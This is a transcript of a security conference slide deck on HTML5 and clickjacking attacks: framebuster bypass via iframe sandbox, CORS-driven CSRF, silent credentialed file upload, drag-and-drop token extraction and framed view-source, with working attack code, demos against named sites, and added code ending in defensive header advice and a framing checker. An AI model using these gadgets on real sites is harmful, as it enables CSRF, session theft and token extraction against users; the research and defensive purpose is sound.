HTML5: Something wicked this way comes
Krzysztof Kotowicz, Securing
Slide-deck transcript
About me
• security researcher
  • HTML5
  • UI redressing / clickjacking
  • xss-track, squid-imposter, ...
• pentester
• IT security trainer
  • „Hacking HTML5”
Plan
• Same origin policy
• Exploiting users
• Attack gadgets
• Wrap-up
Same origin policy
• the single most important security concept for the web
• restricts how documents from different origins (scheme, host and port) may read or touch each other's content
• has many flavors: DOM access, XMLHttpRequest, cookies and browser plugins each apply their own variant of the rule
• without it hell breaks loose
Same origin policy
• can be relaxed though
  • crossdomain.xml (Flash / Silverlight cross-domain policy file)
  • document.domain
  • HTML5 Cross Origin Resource Sharing
• or ignored...
  • by exploiting users
  • UI redressing (clickjacking)
Exploiting users

Users
• like games
  • 100 mln play social games //goo.gl/RRWlM
• are not security-savvy
Combined attacks
• Gadgets
  • HTML5
  • UI redressing
• Join them
• New attacks
Gadgets
Basic clickjacking

[Diagrams, slides 10 to 13: a 20x20 <iframe> sits on the attacker's page. Inside it the victim website is loaded full size and shifted by top: -300px / left: -350px, so the only part visible through the 20x20 window is the victim's "Like us, plz!" button.]
Basic clickjacking

```html
<!-- outer page: an invisible 20x20 window the user is told to click -->
<iframe src=inner.html width=20 height=20 scrolling=no style="opacity:0;"></iframe>

<!-- inner.html: the victim, shifted so that the target button sits under that window -->
<iframe src="//victim" width=5000 height=5000
        style="position: absolute; top:-300px; left: -350px;"></iframe>
```
Basic clickjacking
• Trick: Click here to see a video!
• User action: click
+ Any clickable action
+ Works in every browser
- X-Frame-Options
- JS framebusting
HTML5 IFRAME sandbox
• Used to embed untrusted content
  • prevents XSS (scripts are off unless allow-scripts is given)
  • prevents defacement
• Facilitates clickjacking!
  • the flag set below leaves out allow-top-navigation, so the framed page cannot change top.location and a `top.location = self.location` framebuster fails silently

```html
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//victim"></iframe>
```

//html5sec.org/#122
HTML5 IFRAME sandbox
+ Chrome / Safari / IE 10
+ Will disable most JS framebusters
- X-Frame-Options (a response header the sandbox cannot override)
Cross Origin Resource Sharing
• HTML5-ish (specified next to XMLHttpRequest Level 2 rather than in HTML5 itself)
• Cross-domain AJAX
• With cookies (withCredentials)
• Blind: the response stays unreadable unless the receiving site agrees via Access-Control-Allow-Origin, but the request itself is delivered regardless
• Not limited to <form> syntax: any request body, e.g. text/plain or a hand-built multipart
• Used to trigger CSRF
Cross Origin Resource Sharing

```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim", true);
// text/plain is a CORS-safelisted Content-Type: the request goes out without a preflight
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = true; // send cookies
xhr.send("Anything I want");
// the response is invisible to this page unless victim answers with
// Access-Control-Allow-Origin for our origin and Access-Control-Allow-Credentials: true
```
Cross Origin Resource Sharing

What arrives at the victim (cookie included, Origin set by the browser):

```http
POST / HTTP/1.1
Host: victim
Connection: keep-alive
Referer: http://dev.localhost/temp/cors.php
Content-Length: 15
Origin: http://dev.localhost
Content-Type: text/plain
...
Cookie: my-cookie=myvalue

Anything I want
```
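The whole point of the text/plain trick is that the browser sends the request without asking the victim first. The following is an added example, not code from the slides: a classifier that applies the CORS "simple request" rules (the Fetch standard's safelisted methods and headers) to a request description and says whether a preflight would be sent. The sample requests are constructed; the X-Requested-With variant is included because that header is what many frameworks rely on to force a preflight.

```javascript
// Added example, not from the slides: classify a cross-origin request as a CORS
// "simple request" (sent at once, cookies included when withCredentials is set,
// whether or not the target site opts in) or as one that triggers an OPTIONS
// preflight, which a site without CORS headers will fail. The method/header
// rules follow the Fetch standard's CORS-safelisted definitions; the byte-level
// value checks for Accept/Accept-Language and the 128-byte total limit on
// safelisted header values are omitted. Sample requests are constructed.

const SAFELISTED_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFELISTED_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SAFELISTED_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// request: { method, headers } with only the headers the page sets itself
// (Origin, Cookie, Host and Referer are added by the browser and never count).
// Returns { preflight: boolean, reasons: string[] }.
function needsPreflight(request) {
  const reasons = [];
  const method = (request.method || 'GET').toUpperCase();
  if (!SAFELISTED_METHODS.has(method)) {
    reasons.push('method ' + method + ' is not GET, HEAD or POST');
  }
  for (const [name, value] of Object.entries(request.headers || {})) {
    const lname = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lname)) {
      reasons.push('header ' + name + ' is not CORS-safelisted');
    } else if (lname === 'content-type') {
      // Only the media type matters; parameters such as boundary= are fine.
      const essence = String(value).split(';')[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(essence)) {
        reasons.push('Content-Type ' + essence + ' is not form-urlencoded, multipart or text/plain');
      }
    }
  }
  return { preflight: reasons.length > 0, reasons };
}

// The slide's text/plain POST, the multipart upload from the next section, and
// three variants that do trigger a preflight.
const SAMPLES = {
  textPlainPost: { method: 'POST', headers: { 'Content-Type': 'text/plain' } },
  multipartPost: { method: 'POST', headers: { 'Content-Type': 'multipart/form-data; boundary=xxxxxxxxx' } },
  jsonPost:      { method: 'POST', headers: { 'Content-Type': 'application/json' } },
  customHeader:  { method: 'GET',  headers: { 'X-Requested-With': 'XMLHttpRequest' } },
  putRequest:    { method: 'PUT',  headers: { 'Content-Type': 'text/plain' } },
};

function classifyAll() {
  const out = {};
  for (const [name, req] of Object.entries(SAMPLES)) out[name] = needsPreflight(req);
  return out;
}

for (const [name, { preflight, reasons }] of Object.entries(classifyAll())) {
  console.log(name + ': ' + (preflight ? 'PREFLIGHT needed (' + reasons.join('; ') + ')'
                                       : 'simple request, goes out with cookies'));
}
```

Note that withCredentials plays no part in the decision: cookies ride along on a simple request just as they do on a form post, which is exactly why an endpoint that only checks for a session cookie is CSRF-able through XHR.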
Silent file upload
• File upload purely in JavaScript
• Behaves like an <input type=file> submission, but with any file name and content the attacker picks and no file dialog
• Uses CORS (a credentialed cross-domain XMLHttpRequest)
• How? Build the raw multipart/form-data body by hand
Silent file upload

```javascript
function fileUpload(url, fileData, fileName) {
  var boundary = "xxxxxxxxx",
      xhr = new XMLHttpRequest();
  xhr.open("POST", url, true);
  xhr.withCredentials = true; // send the victim's cookies
  // multipart/form-data is a CORS-safelisted type, so no preflight is sent;
  // the boundary parameter is separated by ';' (RFC 2046), not ','
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  // Content-Length is a forbidden request header: the browser computes it
  // itself and ignores any attempt to set it from script
  var body = "--" + boundary + "\r\n" +
    'Content-Disposition: form-data; name="contents"; filename="' + fileName + '"\r\n' +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    fileData + "\r\n" +
    "--" + boundary + "--";
  xhr.send(body);
}
```
Silent file upload
+ No user action
+ No frames
+ Cross-domain, with cookies
+ Works in most browsers
+ You can add more form fields
- CSRF flaw needed (the upload endpoint must accept the request without a valid anti-CSRF token)
- No access to the response
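The body the slides assemble by hand, generalised to any number of extra form fields and paired with a small parser so you can check what the upload endpoint will actually see. This is an added example, not the slides' code; the field names, the fake file and the endpoint are constructed for it, and the boundary is randomised instead of the fixed "xxxxxxxxx".

```javascript
// Added example, not the slides' code: build the raw multipart/form-data body a
// silent cross-origin upload sends, with any number of extra form fields, and
// parse it back the way a server would. Field names, file contents and the
// endpoint are constructed for this example.

const CRLF = '\r\n';

function randomBoundary() {
  // A boundary only needs to be absent from the payload; 24 random hex digits suffice.
  let b = '----silentupload';
  for (let i = 0; i < 24; i++) b += Math.floor(Math.random() * 16).toString(16);
  return b;
}

// fields: { name: value } plain inputs; file: { field, filename, contentType, data }
// plays the part of an <input type=file> the user never touched.
function buildMultipart(fields, file, boundary = randomBoundary()) {
  let body = '';
  for (const [name, value] of Object.entries(fields)) {
    body += '--' + boundary + CRLF +
      'Content-Disposition: form-data; name="' + name + '"' + CRLF + CRLF +
      value + CRLF;
  }
  body += '--' + boundary + CRLF +
    'Content-Disposition: form-data; name="' + file.field + '"; filename="' + file.filename + '"' + CRLF +
    'Content-Type: ' + (file.contentType || 'application/octet-stream') + CRLF + CRLF +
    file.data + CRLF +
    '--' + boundary + '--' + CRLF;
  // multipart/form-data is CORS-safelisted, so the request goes out without a preflight.
  return { contentType: 'multipart/form-data; boundary=' + boundary, body };
}

// Minimal parser for bodies of the shape above (no nested multipart, no
// quoted-string escapes). Returns [{ name, filename, contentType, data }].
function parseMultipart(contentType, body) {
  const m = /boundary=([^;]+)/.exec(contentType);
  if (!m) throw new Error('no boundary parameter in Content-Type');
  const parts = [];
  for (const chunk of body.split('--' + m[1].trim())) {
    if (chunk === '' || chunk.startsWith('--')) continue; // preamble / closing marker
    const sep = chunk.indexOf(CRLF + CRLF);
    if (sep < 0) continue;
    const part = { name: null, filename: null, contentType: null,
                   data: chunk.slice(sep + 2 * CRLF.length, chunk.length - CRLF.length) };
    for (const line of chunk.slice(CRLF.length, sep).split(CRLF)) {
      if (/^content-disposition:/i.test(line)) {
        const name = /;\s*name="([^"]*)"/.exec(line);
        const filename = /;\s*filename="([^"]*)"/.exec(line);
        part.name = name ? name[1] : null;
        part.filename = filename ? filename[1] : null;
      } else if (/^content-type:/i.test(line)) {
        part.contentType = line.slice(line.indexOf(':') + 1).trim();
      }
    }
    parts.push(part);
  }
  return parts;
}

// Browser side: what the attacker's page would run against a CSRF-able upload endpoint.
function silentUpload(url, fields, file) {
  const { contentType, body } = buildMultipart(fields, file);
  const xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.withCredentials = true;                        // attach the victim's cookies
  xhr.setRequestHeader('Content-Type', contentType); // Content-Length is set by the browser
  xhr.send(body);                                    // response stays unreadable without ACAO
}

// Constructed sample: two ordinary fields plus a fake file input.
const SAMPLE_FIELDS = { album: 'demo', title: 'hello' };
const SAMPLE_FILE = { field: 'contents', filename: 'evil.html', contentType: 'text/html',
                      data: '<script>alert(document.domain)</script>' };

function roundTrip() {
  const { contentType, body } = buildMultipart(SAMPLE_FIELDS, SAMPLE_FILE, 'testboundary123');
  return parseMultipart(contentType, body);
}
```

Running roundTrip() in Node shows three parts, the last one carrying the filename, the Content-Type and the HTML payload exactly as a server's multipart parser would hand them to the upload handler; silentUpload() is the browser-side call and needs a real page to run.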
Silent file upload
DEMO: Flickr.com
Flickr.com attack toolbox
• Remember me
  • Flickr creates a logged-in session on the first request
• CSRF file upload
  • http://up.flickr.com/photos/upload/transfer/
  • accepts file uploads
  • token check skipped
Drag into
• Put the attacker's content into the victim's form (the user drags it there)
Drag into
• Trick: Put the paper in the can!
• User action: drag & drop, click
+ Inject arbitrary content
+ Trigger self-XSS
- Firefox only
- X-Frame-Options
- JS framebusting
Drag out content extraction
DEMO: Alphabet Hero
Drag into
Self-XSS in real life:
• WordPress 0-day (Jelmer de Hen) //goo.gl/dNYi5
• chronme.com (sneaked.net) //goo.gl/hs7Bw
• Google Code vulns (Amol Naik) //goo.gl/NxKFY
Drag out content extraction

[Diagrams, slides 31 to 33: the "game" shows two images. An invisible <iframe> with the victim page is placed under the image the user is told to drag, and an invisible <textarea> under the image they are told to drop it on. What the user really drags is a link or selection from the victim frame, and its text lands in the attacker's <textarea>.]
Drag out content extraction

```html
<div id=game style="position:relative">
  <img style="position:absolute;..." src="paper.png" />
  <img style="position:absolute;..." src="trash.png" />
  <iframe scrolling=no id=iframe style="position:absolute;opacity:0;...">
  </iframe>
  <textarea style="position:absolute; opacity:0;..." id=dropper></textarea>
</div>
```
Drag out content extraction

```javascript
$("#iframe").attr('src', 'outer.html');
$('#dropper').bind('drop', function() {
  // the dropped link arrives as text in the textarea; wait a moment so the
  // browser has finished inserting it before reading the value
  setTimeout(function() {
    var urlmatch = $("#dropper").val()
      .match(/token=([a-h0-9]+)$/);
    if (urlmatch) {
      var token = urlmatch[1];
      // do EVIL
    }
  }, 100);
});
```
Drag out content extraction
• Trick: Put the paper in the can!
• User action: drag & drop
+ Access sensitive content cross-domain
- Firefox only
- X-Frame-Options
- JS framebusting
Drag out content extraction
DEMO: Min.us
Min.us attack toolbox
• CORS to create a gallery
• social engineering
  • extract the gallery editor-id from an <a href>
• silent file upload to the gallery
• CORS to change the gallery to public
• HTML5 + UI redressing combined!
View-source

```html
<iframe src="view-source:view-source:http://victim" width=5000 height=5000
        style="position: absolute; top: -300px; left: -150px;"></iframe>
```

• Display the HTML source of the victim page in a frame; the source contains
  • session IDs
  • tokens
  • private data
View-source
42
![Page 43: Krzysztof Kotowicz Securing · Same origin policy •can be relaxed though •crossdomain.xml •document.domain •HTML5 Cross Origin Resource Sharing •or ignored... •by exploiting](https://reader035.vdocuments.us/reader035/viewer/2022062920/5f026c087e708231d404316b/html5/thumbnails/43.jpg)
View-source
43
View-source
• Trick: Your serial number is...
• User action: select + drag & drop, or copy-paste
+ Beats JS framebusting (a view-source: document runs no scripts)
+ Already earned $500 from Facebook
- X-Frame-Options
- Firefox only
- Complicated user action
View-source
DEMO: Imgur.com
Imgur.com attack toolbox
• framed view-source:
  • captcha-like string (AdSense ID)
  • session ID
• social engineering:
  • trick the user into copy/pasting the page source
• Exploitation:
  • http://api.imgur.com
  • cookie auth, no IP limits for the session
Summary
• UI redressing attacks are improving
• HTML5 helps exploiting vulnerabilities
• Users can be a weak link too!
Devs: Use X-Frame-Options: DENY (or SAMEORIGIN if you must frame your own pages). JS framebusters are not enough, as the sandbox attribute shows. Content-Security-Policy: frame-ancestors is the standardised successor to X-Frame-Options and is honoured in preference to it when both headers are present.
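Every gadget above lists "- X-Frame-Options" as the thing that stops it, and the summary's advice is to send it. The following is an added example, not from the slides: a checker that takes a victim page's response headers and the origin of a would-be framing page and decides whether a current browser will render the frame, applying X-Frame-Options (DENY / SAMEORIGIN) and CSP frame-ancestors source matching, with CSP taking precedence. The origins and header sets are constructed for the example; ALLOW-FROM is treated as ignored, which is how Chrome, Safari and current Firefox handle it.

```javascript
// Added example, not from the slides: given the response headers a victim page
// sends and the origin of the page that wants to frame it, decide whether a
// current browser will render it inside an <iframe>. Covers X-Frame-Options
// (DENY / SAMEORIGIN) and CSP frame-ancestors; when both are present the CSP
// directive wins and X-Frame-Options is ignored. Origins and headers below are
// constructed for this example.

function defaultPort(scheme) {
  return scheme === 'https' ? '443' : scheme === 'http' ? '80' : '';
}

function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.slice(0, -1);
  return { scheme, host: u.hostname.toLowerCase(), port: u.port || defaultPort(scheme) };
}

function isSameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Does one frame-ancestors source expression match the embedding origin?
// Handles 'none', 'self', *, scheme-source (https:) and host-source with an
// optional scheme, a *. wildcard host and a port; path components are not supported.
function sourceMatches(expr, embedder, victim) {
  const src = expr.trim().toLowerCase();
  if (src === "'none'") return false;
  if (src === '*') return true;
  if (src === "'self'") return isSameOrigin(embedder, victim);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return embedder.scheme === src.slice(0, -1);
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:\/]+)(?::(\*|\d+))?$/.exec(src);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme) {
    if (scheme !== embedder.scheme) return false;
  } else if (embedder.scheme !== victim.scheme &&
             !(victim.scheme === 'http' && embedder.scheme === 'https')) {
    return false; // no scheme given: must match the victim's, except for an http -> https upgrade
  }
  if (host.startsWith('*.')) {
    if (!embedder.host.endsWith(host.slice(1))) return false; // wildcard never matches the apex
  } else if (host !== embedder.host) {
    return false;
  }
  if (port === '*') return true;
  if (port) return port === embedder.port;
  return embedder.port === defaultPort(embedder.scheme);
}

// Returns { allowed, by } where `by` names the header that decided.
function canFrame(victimOrigin, embedderOrigin, headers) {
  const victim = parseOrigin(victimOrigin);
  const embedder = parseOrigin(embedderOrigin);
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1); // empty list blocks everything
    return { allowed: sources.some(s => sourceMatches(s, embedder, victim)), by: 'frame-ancestors' };
  }

  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return { allowed: false, by: 'X-Frame-Options: DENY' };
  if (xfo === 'sameorigin') return { allowed: isSameOrigin(embedder, victim), by: 'X-Frame-Options: SAMEORIGIN' };
  // ALLOW-FROM and malformed values are ignored by Chrome, Safari and current
  // Firefox, so they leave the page frameable.
  return { allowed: true, by: xfo ? 'X-Frame-Options ignored (' + xfo + ')' : 'no framing restriction' };
}

// Constructed victim and attacker origins plus a few header sets to evaluate.
const VICTIM = 'https://victim.example';
const ATTACKER = 'https://evil.example';
const HEADER_SETS = {
  none: {},
  deny: { 'X-Frame-Options': 'DENY' },
  sameorigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  allowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  cspPartner: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
  cspOverridesXfo: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
};

function report(embedder = ATTACKER) {
  const out = {};
  for (const [name, headers] of Object.entries(HEADER_SETS)) out[name] = canFrame(VICTIM, embedder, headers);
  return out;
}

if (typeof require !== 'undefined' && require.main === module) console.log(report());
```

Two results worth noticing in report(): the ALLOW-FROM set comes back frameable, because the only browsers that ever honoured it no longer do, and the cspOverridesXfo set comes back frameable despite DENY, because a present frame-ancestors directive silences X-Frame-Options entirely. Audit both headers together, not just one.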
Links
• html5sec.org
• code.google.com/p/html5security
• www.contextis.co.uk/research/white-papers/clickjacking
• blog.kotowicz.net
• github.com/koto
Twitter: @[email protected]